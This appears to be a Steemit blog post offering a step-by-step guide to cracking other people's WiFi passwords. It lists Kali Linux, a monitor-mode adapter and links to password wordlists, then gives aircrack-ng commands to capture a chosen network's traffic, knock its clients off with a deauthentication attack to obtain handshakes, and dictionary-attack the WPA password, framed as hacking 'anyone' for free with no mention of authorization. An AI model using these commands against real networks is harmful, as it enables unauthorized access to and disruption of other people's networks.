Hacking WiFi Passwords of Anyone Free ! :DsteemCreated with Sketch.

in #wifihacking7 years ago

hack-wi-fi-selecting-good-wi-fi-hacking-strategy.1280x600.jpg

REQUIREMENTS :

  1. Kali Linux OS (download from https://www.kali.org/downloads/ and install/or run Live index.jpeg first option :Live AMD64
  2. External WiFi Adapter that support monitor mode images.jpeg
  3. Dictionary Wordlist that may contain Wifi Passwords
    Download one of these
    http://www.mediafire.com/view/7d7nz2kku7urzor/rockyou.txt
    http://www.mediafire.com/file/qk1m9vewvk868yp/BIG-WPA-LIST-1.rar
    http://www.myhomereviewsblog.com/wp-content/uploads/2016/02/BIG-WPA-LIST-22.rar
    http://www.myhomereviewsblog.com/wp-content/uploads/2016/02/BIG-WPA-LIST-22.rar
    https://www.4shared.com/rar/7I1dCSBZba/BIG-WPA-LIST-3.html

Step 1. in Kali linux > Select terminal from left Corner i.e"Black command Interface tool"
images.jpeg

Step 2. type> cd desktop

Step 3. Go to Monitor Mode
type> airmon-ng
to get adapter type like mine is wlan0
Screenshot from 2017-06-24 11-32-52.png
type> airmon-ng start wlan0
Screenshot from 2017-06-24 11-34-52.png
Step 4. Show all WiFi networks Details

              type>  airodump-ng wlan0mon

Screenshot from 2017-06-24 11-35-37.png
Press CTRL+C to stop and select your target > note BSSID + Channel for later use of that network
Step 5. Capture the packets of WiFi network

               type> airodump-ng -c [channel] --bssid [bssid] -w [packets-save] wlan0mon

Screenshot from 2017-06-24 11-40-00.png
Step 6. Kickoff clients from network

                type>  aireplay-ng -0 2 -a [bssid] wlan0

Screenshot from 2017-06-24 11-41-01.png
Wait for Handshakes that is required for cracking at top-left corner : here:
Screenshot from 2017-06-24 11-41-49.png
Step 7. Dictionary attack on captured handshakes of wifi

                 type>  aircrack-ng -a2 -b [bssid] -w [wordlist-location] [handshakes-files-location/*.cap]  

Screenshot from 2017-06-24 11-43-32.png

RESULT :
Screenshot from 2017-06-24 11-44-35.png
Cracking Starts up for password > After few minutes or hours password will reveal
like
Screenshot from 2017-06-24 11-44-57.png

YAHOOOOO.............! :) ;)

Coin Marketplace

STEEM 0.16
TRX 0.15
JST 0.028
BTC 56542.34
ETH 2391.51
USDT 1.00
SBD 2.30